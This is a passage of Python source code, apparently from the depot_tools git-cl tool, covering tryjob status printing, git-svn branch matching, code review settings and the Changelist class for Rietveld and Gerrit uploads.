colorize = lambda x: '%s%s%s' % (color, x, Fore.RESET)
result = []
for b in builds.values():
if all(b.get(k) == v for k, v in kwargs.iteritems()):
builds.pop(b['id'])
result.append(b)
if result:
print(colorize(title))
for b in sorted(result, key=sort_key):
print(' ', colorize('\t'.join(map(str, f(b)))))
total = len(builds)
pop(status='COMPLETED', result='SUCCESS',
title='Successes:', color=Fore.GREEN,
f=lambda b: (get_name(b), b.get('url')))
pop(status='COMPLETED', result='FAILURE', failure_reason='INFRA_FAILURE',
title='Infra Failures:', color=Fore.MAGENTA,
f=lambda b: (get_name(b), b.get('url')))
pop(status='COMPLETED', result='FAILURE', failure_reason='BUILD_FAILURE',
title='Failures:', color=Fore.RED,
f=lambda b: (get_name(b), b.get('url')))
pop(status='COMPLETED', result='CANCELED',
title='Canceled:', color=Fore.MAGENTA,
f=lambda b: (get_name(b),))
pop(status='COMPLETED', result='FAILURE',
failure_reason='INVALID_BUILD_DEFINITION',
title='Wrong master/builder name:', color=Fore.MAGENTA,
f=lambda b: (get_name(b),))
pop(status='COMPLETED', result='FAILURE',
title='Other failures:',
f=lambda b: (get_name(b), b.get('failure_reason'), b.get('url')))
pop(status='COMPLETED',
title='Other finished:',
f=lambda b: (get_name(b), b.get('result'), b.get('url')))
pop(status='STARTED',
title='Started:', color=Fore.YELLOW,
f=lambda b: (get_name(b), b.get('url')))
pop(status='SCHEDULED',
title='Scheduled:',
f=lambda b: (get_name(b), 'id=%s' % b['id']))
# The last section is just in case buildbucket API changes OR there is a bug.
pop(title='Other:',
f=lambda b: (get_name(b), 'id=%s' % b['id']))
assert len(builds) == 0
print('Total: %d tryjobs' % total)
def MatchSvnGlob(url, base_url, glob_spec, allow_wildcards):
"""Return the corresponding git ref if |base_url| together with |glob_spec|
matches the full |url|.
If |allow_wildcards| is true, |glob_spec| can contain wildcards (see below).
"""
fetch_suburl, as_ref = glob_spec.split(':')
if allow_wildcards:
glob_match = re.match('(.+/)?(\*|{[^/]*})(/.+)?', fetch_suburl)
if glob_match:
# Parse specs like "branches/*/src:refs/remotes/svn/*" or
# "branches/{472,597,648}/src:refs/remotes/svn/*".
branch_re = re.escape(base_url)
if glob_match.group(1):
branch_re += '/' + re.escape(glob_match.group(1))
wildcard = glob_match.group(2)
if wildcard == '*':
branch_re += '([^/]*)'
else:
# Escape and replace surrounding braces with parentheses and commas
# with pipe symbols.
wildcard = re.escape(wildcard)
wildcard = re.sub('^\\\\{', '(', wildcard)
wildcard = re.sub('\\\\,', '|', wildcard)
wildcard = re.sub('\\\\}$', ')', wildcard)
branch_re += wildcard
if glob_match.group(3):
branch_re += re.escape(glob_match.group(3))
match = re.match(branch_re, url)
if match:
return re.sub('\*$', match.group(1), as_ref)
# Parse specs like "trunk/src:refs/remotes/origin/trunk".
if fetch_suburl:
full_url = base_url + '/' + fetch_suburl
else:
full_url = base_url
if full_url == url:
return as_ref
return None
def print_stats(similarity, find_copies, args):
"""Prints statistics about the change to the user."""
# --no-ext-diff is broken in some versions of Git, so try to work around
# this by overriding the environment (but there is still a problem if the
# git config key "diff.external" is used).
env = GetNoGitPagerEnv()
if 'GIT_EXTERNAL_DIFF' in env:
del env['GIT_EXTERNAL_DIFF']
if find_copies:
similarity_options = ['--find-copies-harder', '-l100000',
'-C%s' % similarity]
else:
similarity_options = ['-M%s' % similarity]
try:
stdout = sys.stdout.fileno()
except AttributeError:
stdout = None
return subprocess2.call(
['git',
'diff', '--no-ext-diff', '--stat'] + similarity_options + args,
stdout=stdout, env=env)
class BuildbucketResponseException(Exception):
pass
class Settings(object):
def __init__(self):
self.default_server = None
self.cc = None
self.root = None
self.is_git_svn = None
self.svn_branch = None
self.tree_status_url = None
self.viewvc_url = None
self.updated = False
self.is_gerrit = None
self.squash_gerrit_uploads = None
self.gerrit_skip_ensure_authenticated = None
self.git_editor = None
self.project = None
self.force_https_commit_url = None
self.pending_ref_prefix = None
def LazyUpdateIfNeeded(self):
"""Updates the settings from a codereview.settings file, if available."""
if not self.updated:
# The only value that actually changes the behavior is
# autoupdate = "false". Everything else means "true".
autoupdate = RunGit(['config', 'rietveld.autoupdate'],
error_ok=True
).strip().lower()
cr_settings_file = FindCodereviewSettingsFile()
if autoupdate != 'false' and cr_settings_file:
LoadCodereviewSettingsFromFile(cr_settings_file)
self.updated = True
def GetDefaultServerUrl(self, error_ok=False):
if not self.default_server:
self.LazyUpdateIfNeeded()
self.default_server = gclient_utils.UpgradeToHttps(
self._GetRietveldConfig('server', error_ok=True))
if error_ok:
return self.default_server
if not self.default_server:
error_message = ('Could not find settings file. You must configure '
'your review setup by running "git cl config".')
self.default_server = gclient_utils.UpgradeToHttps(
self._GetRietveldConfig('server', error_message=error_message))
return self.default_server
@staticmethod
def GetRelativeRoot():
return RunGit(['rev-parse', '--show-cdup']).strip()
def GetRoot(self):
if self.root is None:
self.root = os.path.abspath(self.GetRelativeRoot())
return self.root
def GetGitMirror(self, remote='origin'):
"""If this checkout is from a local git mirror, return a Mirror object."""
local_url = RunGit(['config', '--get', 'remote.%s.url' % remote]).strip()
if not os.path.isdir(local_url):
return None
git_cache.Mirror.SetCachePath(os.path.dirname(local_url))
remote_url = git_cache.Mirror.CacheDirToUrl(local_url)
# Use the /dev/null print_func to avoid terminal spew in WaitForRealCommit.
mirror = git_cache.Mirror(remote_url, print_func = lambda *args: None)
if mirror.exists():
return mirror
return None
def GetIsGitSvn(self):
"""Return true if this repo looks like it's using git-svn."""
if self.is_git_svn is None:
if self.GetPendingRefPrefix():
# If PENDING_REF_PREFIX is set then it's a pure git repo no matter what.
self.is_git_svn = False
else:
# If you have any "svn-remote.*" config keys, we think you're using svn.
self.is_git_svn = RunGitWithCode(
['config', '--local', '--get-regexp', r'^svn-remote\.'])[0] == 0
return self.is_git_svn
def GetSVNBranch(self):
if self.svn_branch is None:
if not self.GetIsGitSvn():
DieWithError('Repo doesn\'t appear to be a git-svn repo.')
# Try to figure out which remote branch we're based on.
# Strategy:
# 1) iterate through our branch history and find the svn URL.
# 2) find the svn-remote that fetches from the URL.
# regexp matching the git-svn line that contains the URL.
git_svn_re = re.compile(r'^\s*git-svn-id: (\S+)@', re.MULTILINE)
# We don't want to go through all of history, so read a line from the
# pipe at a time.
# The -100 is an arbitrary limit so we don't search forever.
cmd = ['git', 'log', '-100', '--pretty=medium']
proc = subprocess2.Popen(cmd, stdout=subprocess2.PIPE,
env=GetNoGitPagerEnv())
url = None
for line in proc.stdout:
match = git_svn_re.match(line)
if match:
url = match.group(1)
proc.stdout.close() # Cut pipe.
break
if url:
svn_remote_re = re.compile(r'^svn-remote\.([^.]+)\.url (.*)$')
remotes = RunGit(['config', '--get-regexp',
r'^svn-remote\..*\.url']).splitlines()
for remote in remotes:
match = svn_remote_re.match(remote)
if match:
remote = match.group(1)
base_url = match.group(2)
rewrite_root = RunGit(
['config', 'svn-remote.%s.rewriteRoot' % remote],
error_ok=True).strip()
if rewrite_root:
base_url = rewrite_root
fetch_spec = RunGit(
['config', 'svn-remote.%s.fetch' % remote],
error_ok=True).strip()
if fetch_spec:
self.svn_branch = MatchSvnGlob(url, base_url, fetch_spec, False)
if self.svn_branch:
break
branch_spec = RunGit(
['config', 'svn-remote.%s.branches' % remote],
error_ok=True).strip()
if branch_spec:
self.svn_branch = MatchSvnGlob(url, base_url, branch_spec, True)
if self.svn_branch:
break
tag_spec = RunGit(
['config', 'svn-remote.%s.tags' % remote],
error_ok=True).strip()
if tag_spec:
self.svn_branch = MatchSvnGlob(url, base_url, tag_spec, True)
if self.svn_branch:
break
if not self.svn_branch:
DieWithError('Can\'t guess svn branch -- try specifying it on the '
'command line')
return self.svn_branch
def GetTreeStatusUrl(self, error_ok=False):
if not self.tree_status_url:
error_message = ('You must configure your tree status URL by running '
'"git cl config".')
self.tree_status_url = self._GetRietveldConfig(
'tree-status-url', error_ok=error_ok, error_message=error_message)
return self.tree_status_url
def GetViewVCUrl(self):
if not self.viewvc_url:
self.viewvc_url = self._GetRietveldConfig('viewvc-url', error_ok=True)
return self.viewvc_url
def GetBugPrefix(self):
return self._GetRietveldConfig('bug-prefix', error_ok=True)
def GetIsSkipDependencyUpload(self, branch_name):
"""Returns true if specified branch should skip dep uploads."""
return self._GetBranchConfig(branch_name, 'skip-deps-uploads',
error_ok=True)
def GetRunPostUploadHook(self):
run_post_upload_hook = self._GetRietveldConfig(
'run-post-upload-hook', error_ok=True)
return run_post_upload_hook == "True"
def GetDefaultCCList(self):
return self._GetRietveldConfig('cc', error_ok=True)
def GetDefaultPrivateFlag(self):
return self._GetRietveldConfig('private', error_ok=True)
def GetIsGerrit(self):
"""Return true if this repo is assosiated with gerrit code review system."""
if self.is_gerrit is None:
self.is_gerrit = self._GetConfig('gerrit.host', error_ok=True)
return self.is_gerrit
def GetSquashGerritUploads(self):
"""Return true if uploads to Gerrit should be squashed by default."""
if self.squash_gerrit_uploads is None:
self.squash_gerrit_uploads = self.GetSquashGerritUploadsOverride()
if self.squash_gerrit_uploads is None:
# Default is squash now (http://crbug.com/611892#c23).
self.squash_gerrit_uploads = not (
RunGit(['config', '--bool', 'gerrit.squash-uploads'],
error_ok=True).strip() == 'false')
return self.squash_gerrit_uploads
def GetSquashGerritUploadsOverride(self):
"""Return True or False if codereview.settings should be overridden.
Returns None if no override has been defined.
"""
# See also http://crbug.com/611892#c23
result = RunGit(['config', '--bool', 'gerrit.override-squash-uploads'],
error_ok=True).strip()
if result == 'true':
return True
if result == 'false':
return False
return None
def GetGerritSkipEnsureAuthenticated(self):
"""Return True if EnsureAuthenticated should not be done for Gerrit
uploads."""
if self.gerrit_skip_ensure_authenticated is None:
self.gerrit_skip_ensure_authenticated = (
RunGit(['config', '--bool', 'gerrit.skip-ensure-authenticated'],
error_ok=True).strip() == 'true')
return self.gerrit_skip_ensure_authenticated
def GetGitEditor(self):
"""Return the editor specified in the git config, or None if none is."""
if self.git_editor is None:
self.git_editor = self._GetConfig('core.editor', error_ok=True)
return self.git_editor or None
def GetLintRegex(self):
return (self._GetRietveldConfig('cpplint-regex', error_ok=True) or
DEFAULT_LINT_REGEX)
def GetLintIgnoreRegex(self):
return (self._GetRietveldConfig('cpplint-ignore-regex', error_ok=True) or
DEFAULT_LINT_IGNORE_REGEX)
def GetProject(self):
if not self.project:
self.project = self._GetRietveldConfig('project', error_ok=True)
return self.project
def GetForceHttpsCommitUrl(self):
if not self.force_https_commit_url:
self.force_https_commit_url = self._GetRietveldConfig(
'force-https-commit-url', error_ok=True)
return self.force_https_commit_url
def GetPendingRefPrefix(self):
if not self.pending_ref_prefix:
self.pending_ref_prefix = self._GetRietveldConfig(
'pending-ref-prefix', error_ok=True)
return self.pending_ref_prefix
def _GetRietveldConfig(self, param, **kwargs):
return self._GetConfig('rietveld.' + param, **kwargs)
def _GetBranchConfig(self, branch_name, param, **kwargs):
return self._GetConfig('branch.' + branch_name + '.' + param, **kwargs)
def _GetConfig(self, param, **kwargs):
self.LazyUpdateIfNeeded()
return RunGit(['config', param], **kwargs).strip()
def ShortBranchName(branch):
"""Convert a name like 'refs/heads/foo' to just 'foo'."""
return branch.replace('refs/heads/', '', 1)
def GetCurrentBranchRef():
"""Returns branch ref (e.g., refs/heads/master) or None."""
return RunGit(['symbolic-ref', 'HEAD'],
stderr=subprocess2.VOID, error_ok=True).strip() or None
def GetCurrentBranch():
"""Returns current branch or None.
For refs/heads/* branches, returns just last part. For others, full ref.
"""
branchref = GetCurrentBranchRef()
if branchref:
return ShortBranchName(branchref)
return None
class _CQState(object):
"""Enum for states of CL with respect to Commit Queue."""
NONE = 'none'
DRY_RUN = 'dry_run'
COMMIT = 'commit'
ALL_STATES = [NONE, DRY_RUN, COMMIT]
class _ParsedIssueNumberArgument(object):
def __init__(self, issue=None, patchset=None, hostname=None):
self.issue = issue
self.patchset = patchset
self.hostname = hostname
@property
def valid(self):
return self.issue is not None
class _RietveldParsedIssueNumberArgument(_ParsedIssueNumberArgument):
def __init__(self, *args, **kwargs):
self.patch_url = kwargs.pop('patch_url', None)
super(_RietveldParsedIssueNumberArgument, self).__init__(*args, **kwargs)
def ParseIssueNumberArgument(arg):
"""Parses the issue argument and returns _ParsedIssueNumberArgument."""
fail_result = _ParsedIssueNumberArgument()
if arg.isdigit():
return _ParsedIssueNumberArgument(issue=int(arg))
if not arg.startswith('http'):
return fail_result
url = gclient_utils.UpgradeToHttps(arg)
try:
parsed_url = urlparse.urlparse(url)
except ValueError:
return fail_result
for cls in _CODEREVIEW_IMPLEMENTATIONS.itervalues():
tmp = cls.ParseIssueURL(parsed_url)
if tmp is not None:
return tmp
return fail_result
class Changelist(object):
"""Changelist works with one changelist in local branch.
Supports two codereview backends: Rietveld or Gerrit, selected at object
creation.
Notes:
* Not safe for concurrent multi-{thread,process} use.
* Caches values from current branch. Therefore, re-use after branch change
with care.
"""
def __init__(self, branchref=None, issue=None, codereview=None, **kwargs):
"""Create a new ChangeList instance.
If issue is given, the codereview must be given too.
If `codereview` is given, it must be 'rietveld' or 'gerrit'.
Otherwise, it's decided based on current configuration of the local branch,
with default being 'rietveld' for backwards compatibility.
See _load_codereview_impl for more details.
**kwargs will be passed directly to codereview implementation.
"""
# Poke settings so we get the "configure your server" message if necessary.
global settings
if not settings:
# Happens when git_cl.py is used as a utility library.
settings = Settings()
if issue:
assert codereview, 'codereview must be known, if issue is known'
self.branchref = branchref
if self.branchref:
assert branchref.startswith('refs/heads/')
self.branch = ShortBranchName(self.branchref)
else:
self.branch = None
self.upstream_branch = None
self.lookedup_issue = False
self.issue = issue or None
self.has_description = False
self.description = None
self.lookedup_patchset = False
self.patchset = None
self.cc = None
self.watchers = ()
self._remote = None
self._codereview_impl = None
self._codereview = None
self._load_codereview_impl(codereview, **kwargs)
assert self._codereview_impl
assert self._codereview in _CODEREVIEW_IMPLEMENTATIONS
def _load_codereview_impl(self, codereview=None, **kwargs):
if codereview:
assert codereview in _CODEREVIEW_IMPLEMENTATIONS
cls = _CODEREVIEW_IMPLEMENTATIONS[codereview]
self._codereview = codereview
self._codereview_impl = cls(self, **kwargs)
return
# Automatic selection based on issue number set for a current branch.
# Rietveld takes precedence over Gerrit.
assert not self.issue
# Whether we find issue or not, we are doing the lookup.
self.lookedup_issue = True
for codereview, cls in _CODEREVIEW_IMPLEMENTATIONS.iteritems():
setting = cls.IssueSetting(self.GetBranch())
issue = RunGit(['config', setting], error_ok=True).strip()
if issue:
self._codereview = codereview
self._codereview_impl = cls(self, **kwargs)
self.issue = int(issue)
return
# No issue is set for this branch, so decide based on repo-wide settings.
return self._load_codereview_impl(
codereview='gerrit' if settings.GetIsGerrit() else 'rietveld',
**kwargs)
def IsGerrit(self):
return self._codereview == 'gerrit'
def GetCCList(self):
"""Return the users cc'd on this CL.
Return is a string suitable for passing to gcl with the --cc flag.
"""
if self.cc is None:
base_cc = settings.GetDefaultCCList()
more_cc = ','.join(self.watchers)
self.cc = ','.join(filter(None, (base_cc, more_cc))) or ''
return self.cc
def GetCCListWithoutDefault(self):
"""Return the users cc'd on this CL excluding default ones."""
if self.cc is None:
self.cc = ','.join(self.watchers)
return self.cc
def SetWatchers(self, watchers):
"""Set the list of email addresses that should be cc'd based on the changed
files in this CL.
"""
self.watchers = watchers
def GetBranch(self):
"""Returns the short branch name, e.g. 'master'."""
if not self.branch:
branchref = GetCurrentBranchRef()
if not branchref:
return None
self.branchref = branchref
self.branch = ShortBranchName(self.branchref)
return self.branch
def GetBranchRef(self):
"""Returns the full branch name, e.g. 'refs/heads/master'."""
self.GetBranch() # Poke the lazy loader.
return self.branchref
def ClearBranch(self):
"""Clears cached branch data of this object."""
self.branch = self.branchref = None
@staticmethod
def FetchUpstreamTuple(branch):
"""Returns a tuple containing remote and remote ref,
e.g. 'origin', 'refs/heads/master'
"""
remote = '.'
upstream_branch = RunGit(['config', 'branch.%s.merge' % branch],
error_ok=True).strip()
if upstream_branch:
remote = RunGit(['config', 'branch.%s.remote' % branch]).strip()
else:
upstream_branch = RunGit(['config', 'rietveld.upstream-branch'],
error_ok=True).strip()
if upstream_branch:
remote = RunGit(['config', 'rietveld.upstream-remote']).strip()
else:
# Fall back on trying a git-svn upstream branch.
if settings.GetIsGitSvn():
upstream_branch = settings.GetSVNBranch()
else:
# Else, try to guess the origin remote.
remote_branches = RunGit(['branch', '-r']).split()
if 'origin/master' in remote_branches:
# Fall back on origin/master if it exits.
remote = 'origin'
upstream_branch = 'refs/heads/master'
elif 'origin/trunk' in remote_branches:
# Fall back on origin/trunk if it exists. Generally a shared
# git-svn clone
remote = 'origin'
upstream_branch = 'refs/heads/trunk'
else:
DieWithError(
'Unable to determine default branch to diff against.\n'
'Either pass complete "git diff"-style arguments, like\n'
' git cl upload origin/master\n'
'or verify this branch is set up to track another \n'
'(via the --track argument to "git checkout -b ...").')
return remote, upstream_branch
def GetCommonAncestorWithUpstream(self):
upstream_branch = self.GetUpstreamBranch()
if not BranchExists(upstream_branch):
DieWithError('The upstream for the current branch (%s) does not exist '
'anymore.\nPlease fix it and try again.' % self.GetBranch())
return git_common.get_or_create_merge_base(self.GetBranch(),
upstream_branch)
def GetUpstreamBranch(self):
if self.upstream_branch is None:
remote, upstream_branch = self.FetchUpstreamTuple(self.GetBranch())
if remote is not '.':
upstream_branch = upstream_branch.replace('refs/heads/',
'refs/remotes/%s/' % remote)
upstream_branch = upstream_branch.replace('refs/branch-heads/',
'refs/remotes/branch-heads/')
self.upstream_branch = upstream_branch
return self.upstream_branch
def GetRemoteBranch(self):
if not self._remote:
remote, branch = None, self.GetBranch()
seen_branches = set()
while branch not in seen_branches:
seen_branches.add(branch)
remote, branch = self.FetchUpstreamTuple(branch)
branch = ShortBranchName(branch)
if remote != '.' or branch.startswith('refs/remotes'):
break
else:
remotes = RunGit(['remote'], error_ok=True).split()
if len(remotes) == 1:
remote, = remotes
elif 'origin' in remotes:
remote = 'origin'
logging.warning('Could not determine which remote this change is '
'associated with, so defaulting to "%s". This may '
'not be what you want. You may prevent this message '
'by running "git svn info" as documented here: %s',
self._remote,
GIT_INSTRUCTIONS_URL)
else:
logging.warn('Could not determine which remote this change is '
'associated with. You may prevent this message by '
'running "git svn info" as documented here: %s',
GIT_INSTRUCTIONS_URL)
branch = 'HEAD'
if branch.startswith('refs/remotes'):
self._remote = (remote, branch)
elif branch.startswith('refs/branch-heads/'):
self._remote = (remote, branch.replace('refs/', 'refs/remotes/'))
else:
self._remote = (remote, 'refs/remotes/%s/%s' % (remote, branch))
return self._remote
def GitSanityChecks(self, upstream_git_obj):
"""Checks git repo status and ensures diff is from local commits."""
if upstream_git_obj is None:
if self.GetBranch() is None:
print('ERROR: unable to determine current branch (detached HEAD?)',
file=sys.stderr)
else:
print('ERROR: no upstream branch', file=sys.stderr)
return False
# Verify the commit we're diffing against is in our current branch.
upstream_sha = RunGit(['rev-parse', '--verify', upstream_git_obj]).strip()
common_ancestor = RunGit(['merge-base', upstream_sha, 'HEAD']).strip()
if upstream_sha != common_ancestor:
print('ERROR: %s is not in the current branch. You may need to rebase '
'your tracking branch' % upstream_sha, file=sys.stderr)
return False
# List the commits inside the diff, and verify they are all local.
commits_in_diff = RunGit(
['rev-list', '^%s' % upstream_sha, 'HEAD']).splitlines()
code, remote_branch = RunGitWithCode(['config', 'gitcl.remotebranch'])
remote_branch = remote_branch.strip()
if code != 0:
_, remote_branch = self.GetRemoteBranch()
commits_in_remote = RunGit(
['rev-list', '^%s' % upstream_sha, remote_branch]).splitlines()
common_commits = set(commits_in_diff) & set(commits_in_remote)
if common_commits:
print('ERROR: Your diff contains %d commits already in %s.\n'
'Run "git log --oneline %s..HEAD" to get a list of commits in '
'the diff. If you are using a custom git flow, you can override'
' the reference used for this check with "git config '
'gitcl.remotebranch <git-ref>".' % (
len(common_commits), remote_branch, upstream_git_obj),
file=sys.stderr)
return False
return True
def GetGitBaseUrlFromConfig(self):
"""Return the configured base URL from branch.<branchname>.baseurl.
Returns None if it is not set.
"""
return RunGit(['config', 'branch.%s.base-url' % self.GetBranch()],
error_ok=True).strip()
def GetGitSvnRemoteUrl(self):
"""Return the configured git-svn remote URL parsed from git svn info.
Returns None if it is not set.
"""
# URL is dependent on the current directory.
data = RunGit(['svn', 'info'], cwd=settings.GetRoot())
if data:
keys = dict(line.split(': ', 1) for line in data.splitlines()
if ': ' in line)
return keys.get('URL', None)
return None
def GetRemoteUrl(self):
"""Return the configured remote URL, e.g. 'git://example.org/foo.git/'.
Returns None if there is no remote.
"""
remote, _ = self.GetRemoteBranch()
url = RunGit(['config', 'remote.%s.url' % remote], error_ok=True).strip()
# If URL is pointing to a local directory, it is probably a git cache.
if os.path.isdir(url):
url = RunGit(['config', 'remote.%s.url' % remote],
error_ok=True,
cwd=url).strip()
return url
def GetIssue(self):
"""Returns the issue number as a int or None if not set."""
if self.issue is None and not self.lookedup_issue:
issue = RunGit(['config',
self._codereview_impl.IssueSetting(self.GetBranch())],
error_ok=True).strip()
self.issue = int(issue) or None if issue else None
self.lookedup_issue = True
return self.issue
def GetIssueURL(self):
"""Get the URL for a particular issue."""
issue = self.GetIssue()
if not issue:
return None
return '%s/%s' % (self._codereview_impl.GetCodereviewServer(), issue)
def GetDescription(self, pretty=False):
if not self.has_description:
if self.GetIssue():
self.description = self._codereview_impl.FetchDescription()
self.has_description = True
if pretty:
wrapper = textwrap.TextWrapper()
wrapper.initial_indent = wrapper.subsequent_indent = ' '
return wrapper.fill(self.description)
return self.description
def GetPatchset(self):
"""Returns the patchset number as a int or None if not set."""
if self.patchset is None and not self.lookedup_patchset:
patchset = RunGit(['config', self._codereview_impl.PatchsetSetting()],
error_ok=True).strip()
self.patchset = int(patchset) or None if patchset else None
self.lookedup_patchset = True
return self.patchset
def SetPatchset(self, patchset):
"""Set this branch's patchset. If patchset=0, clears the patchset."""
patchset_setting = self._codereview_impl.PatchsetSetting()
if patchset:
RunGit(['config', patchset_setting, str(patchset)])
self.patchset = patchset
else:
RunGit(['config', '--unset', patchset_setting],
stderr=subprocess2.PIPE, error_ok=True)
self.patchset = None
def SetIssue(self, issue=None):
"""Set this branch's issue. If issue isn't given, clears the issue."""
issue_setting = self._codereview_impl.IssueSetting(self.GetBranch())
codereview_setting = self._codereview_impl.GetCodereviewServerSetting()
if issue:
self.issue = issue
RunGit(['config', issue_setting, str(issue)])
codereview_server = self._codereview_impl.GetCodereviewServer()
if codereview_server:
RunGit(['config', codereview_setting, codereview_server])
else:
# Reset it regardless. It doesn't hurt.
config_settings = [issue_setting, self._codereview_impl.PatchsetSetting()]
for prop in (['last-upload-hash'] +
self._codereview_impl._PostUnsetIssueProperties()):
config_settings.append('branch.%s.%s' % (self.GetBranch(), prop))
for setting in config_settings:
RunGit(['config', '--unset', setting], error_ok=True)
self.issue = None
self.patchset = None
def GetChange(self, upstream_branch, author):
if not self.GitSanityChecks(upstream_branch):
DieWithError('\nGit sanity check failure')
root = settings.GetRelativeRoot()
if not root:
root = '.'
absroot = os.path.abspath(root)
# We use the sha1 of HEAD as a name of this change.
name = RunGitWithCode(['rev-parse', 'HEAD'])[1].strip()
# Need to pass a relative path for msysgit.
try:
files = scm.GIT.CaptureStatus([root], '.', upstream_branch)
except subprocess2.CalledProcessError:
DieWithError(
('\nFailed to diff against upstream branch %s\n\n'
'This branch probably doesn\'t exist anymore. To reset the\n'
'tracking branch, please run\n'
' git branch --set-upstream %s trunk\n'
'replacing trunk with origin/master or the relevant branch') %
(upstream_branch, self.GetBranch()))
issue = self.GetIssue()
patchset = self.GetPatchset()
if issue:
description = self.GetDescription()
else:
# If the change was never uploaded, use the log messages of all commits
# up to the branch point, as git cl upload will prefill the description
# with these log messages.
args = ['log', '--pretty=format:%s%n%n%b', '%s...' % (upstream_branch)]
description = RunGitWithCode(args)[1].strip()
if not author:
author = RunGit(['config', 'user.email']).strip() or None
return presubmit_support.GitChange(
name,
description,
absroot,
files,
issue,
patchset,
author,
upstream=upstream_branch)
def UpdateDescription(self, description):
self.description = description
return self._codereview_impl.UpdateDescriptionRemote(description)
def RunHook(self, committing, may_prompt, verbose, change):
"""Calls sys.exit() if the hook fails; returns a HookResults otherwise."""
try:
return presubmit_support.DoPresubmitChecks(change, committing,
verbose=verbose, output_stream=sys.stdout, input_stream=sys.stdin,
default_presubmit=None, may_prompt=may_prompt,
rietveld_obj=self._codereview_impl.GetRieveldObjForPresubmit(),
gerrit_obj=self._codereview_impl.GetGerritObjForPresubmit())
except presubmit_support.PresubmitFailure as e:
DieWithError(
('%s\nMaybe your depot_tools is out of date?\n'
'If all fails, contact maruel@') % e)
def CMDPatchIssue(self, issue_arg, reject, nocommit, directory):
"""Fetches and applies the issue patch from codereview to local branch."""
if isinstance(issue_arg, (int, long)) or issue_arg.isdigit():
parsed_issue_arg = _ParsedIssueNumberArgument(int(issue_arg))
else:
# Assume url.
parsed_issue_arg = self._codereview_impl.ParseIssueURL(
urlparse.urlparse(issue_arg))
if not parsed_issue_arg or not parsed_issue_arg.valid:
DieWithError('Failed to parse issue argument "%s". '
'Must be an issue number or a valid URL.' % issue_arg)
return self._codereview_impl.CMDPatchWithParsedIssue(
parsed_issue_arg, reject, nocommit, directory)
def CMDUpload(self, options, git_diff_args, orig_args):
"""Uploads a change to codereview."""
if git_diff_args:
# TODO(ukai): is it ok for gerrit case?
base_branch = git_diff_args[0]
else:
if self.GetBranch() is None:
DieWithError('Can\'t upload from detached HEAD state. Get on a branch!')
# Default to diffing against common ancestor of upstream branch
base_branch = self.GetCommonAncestorWithUpstream()
git_diff_args = [base_branch, 'HEAD']
# Make sure authenticated to codereview before running potentially expensive
# hooks. It is a fast, best efforts check. Codereview still can reject the
# authentication during the actual upload.
self._codereview_impl.EnsureAuthenticated(force=options.force)
# Apply watchlists on upload.
change = self.GetChange(base_branch, None)
watchlist = watchlists.Watchlists(change.RepositoryRoot())
files = [f.LocalPath() for f in change.AffectedFiles()]
if not options.bypass_watchlists:
self.SetWatchers(watchlist.GetWatchersForPaths(files))
if not options.bypass_hooks:
if options.reviewers or options.tbr_owners:
# Set the reviewer list now so that presubmit checks can access it.
change_description = ChangeDescription(change.FullDescriptionText())
change_description.update_reviewers(options.reviewers,
options.tbr_owners,
change)
change.SetDescriptionText(change_description.description)
hook_results = self.RunHook(committing=False,
may_prompt=not options.force,
verbose=options.verbose,
change=change)
if not hook_results.should_continue():
return 1
if not options.reviewers and hook_results.reviewers:
options.reviewers = hook_results.reviewers.split(',')
if self.GetIssue():
latest_patchset = self.GetMostRecentPatchset()
local_patchset = self.GetPatchset()
if (latest_patchset and local_patchset and
local_patchset != latest_patchset):
print('The last upload made from this repository was patchset #%d but '
'the most recent patchset on the server is #%d.'
% (local_patchset, latest_patchset))
print('Uploading will still work, but if you\'ve uploaded to this '
'issue from another machine or branch the patch you\'re '
'uploading now might not include those changes.')
ask_for_data('About to upload; enter to confirm.')
print_stats(options.similarity, options.find_copies, git_diff_args)
ret = self.CMDUploadChange(options, git_diff_args, change)
if not ret:
git_set_branch_value('last-upload-hash',
RunGit(['rev-parse', 'HEAD']).strip())
# Run post upload hooks, if specified.
if settings.GetRunPostUploadHook():
presubmit_support.DoPostUploadExecuter(
change,
self,
settings.GetRoot(),
options.verbose,
sys.stdout)
# Upload all dependencies if specified.
if options.dependencies:
print()
print('--dependencies has been specified.')
print('All dependent local branches will be re-uploaded.')
print()
# Remove the dependencies flag from args so that we do not end up in a
# loop.
orig_args.remove('--dependencies')
ret = upload_branch_deps(self, orig_args)
return ret
def SetCQState(self, new_state):
"""Update the CQ state for latest patchset.
Issue must have been already uploaded and known.
"""
assert new_state in _CQState.ALL_STATES
assert self.GetIssue()
return self._codereview_impl.SetCQState(new_state)
# Forward methods to codereview specific implementation.
def CloseIssue(self):
return self._codereview_impl.CloseIssue()
def GetStatus(self):
return self._codereview_impl.GetStatus()
def GetCodereviewServer(self):
return self._codereview_impl.GetCodereviewServer()
def GetApprovingReviewers(self):
return self._codereview_impl.GetApprovingReviewers()
def GetMostRecentPatchset(self):
return self._codereview_impl.GetMostRecentPatchset()
def __getattr__(self, attr):
# This is because lots of untested code accesses Rietveld-specific stuff
# directly, and it's hard to fix for sure. So, just let it work, and fix
# on a case by case basis.
return getattr(self._codereview_impl, attr)
class _ChangelistCodereviewBase(object):
"""Abstract base class encapsulating codereview specifics of a changelist."""
def __init__(self, changelist):
self._changelist = changelist # instance of Changelist
def __getattr__(self, attr):
# Forward methods to changelist.
# TODO(tandrii): maybe clean up _GerritChangelistImpl and
# _RietveldChangelistImpl to avoid this hack?
return getattr(self._changelist, attr)
def GetStatus(self):
"""Apply a rough heuristic to give a simple summary of an issue's review
or CQ status, assuming adherence to a common workflow.
Returns None if no issue for this branch, or specific string keywords.
"""
raise NotImplementedError()
def GetCodereviewServer(self):
"""Returns server URL without end slash, like "https://codereview.com"."""
raise NotImplementedError()
def FetchDescription(self):
"""Fetches and returns description from the codereview server."""
raise NotImplementedError()
def GetCodereviewServerSetting(self):
"""Returns git config setting for the codereview server."""
raise NotImplementedError()
@classmethod
def IssueSetting(cls, branch):
return 'branch.%s.%s' % (branch, cls.IssueSettingSuffix())
@classmethod
def IssueSettingSuffix(cls):
"""Returns name of git config setting which stores issue number for a given
branch."""
raise NotImplementedError()
def PatchsetSetting(self):
"""Returns name of git config setting which stores issue number."""
raise NotImplementedError()
def _PostUnsetIssueProperties(self):
"""Which branch-specific properties to erase when unsettin issue."""
raise NotImplementedError()
def GetRieveldObjForPresubmit(self):
# This is an unfortunate Rietveld-embeddedness in presubmit.
# For non-Rietveld codereviews, this probably should return a dummy object.
raise NotImplementedError()
def GetGerritObjForPresubmit(self):
# None is valid return value, otherwise presubmit_support.GerritAccessor.
return None
def UpdateDescriptionRemote(self, description):
"""Update the description on codereview site."""
